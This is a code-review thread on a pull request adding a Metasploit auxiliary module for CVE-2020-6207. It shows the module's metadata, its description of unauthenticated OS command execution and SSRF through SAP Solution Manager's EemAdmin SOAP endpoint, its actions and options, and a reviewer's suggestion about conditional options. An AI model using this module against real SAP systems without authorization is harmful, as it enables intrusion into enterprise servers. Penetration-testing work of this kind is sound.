modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb

```diff
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/sap_solman/client'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Metasploit::Framework::SapSolutionManager::Client
+
+  @agents = Array.new # Array of connected agents
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+            'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
+            'Dmitry Chastuhin', # @chipik The researcher who made first PoC
+            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+          ],
+        'Description' => %q{
+          This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
+          SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
+          checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
+          send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
+
+          Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
+          to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
+        },
+        'References' =>
+          [
+            ['CVE', '2020-6207'],
+            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+          ],
+        'Actions' => [
+          ['LIST', { 'Description' => 'List connected agents' }],
+          ['SSRF', { 'Description' => 'Send SSRF from connected agent' }],
+          ['EXEC', { 'Description' => 'Exec OS command on connected agent' }]
+        ],
+        'DefaultAction' => 'LIST',
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('URIPATH', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('SSRF_METHOD', [false, 'HTTP method for SSRF', 'GET']),
+        OptString.new('SSRF_URI', [false, 'URI for SSRF', 'http://127.0.0.1:80/']),
```

Comment:
You should filter these out depending on when they're used so the user sees the options based on what they're trying to do.

Something like this:

```suggestion
        OptString.new('SSRF_METHOD', [false, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
        OptString.new('SSRF_URI', [false, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
        OptString.new('COMMAND', [false, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
```

Reply:
Added conditions in options in auxiliary module cve_2020_6207_solman_rce.rb: https://github.com/rapid7/metasploit-framework/pull/14924/commits/0fae3f4805f2e9715955cd7f6d13ae306a5f4ff6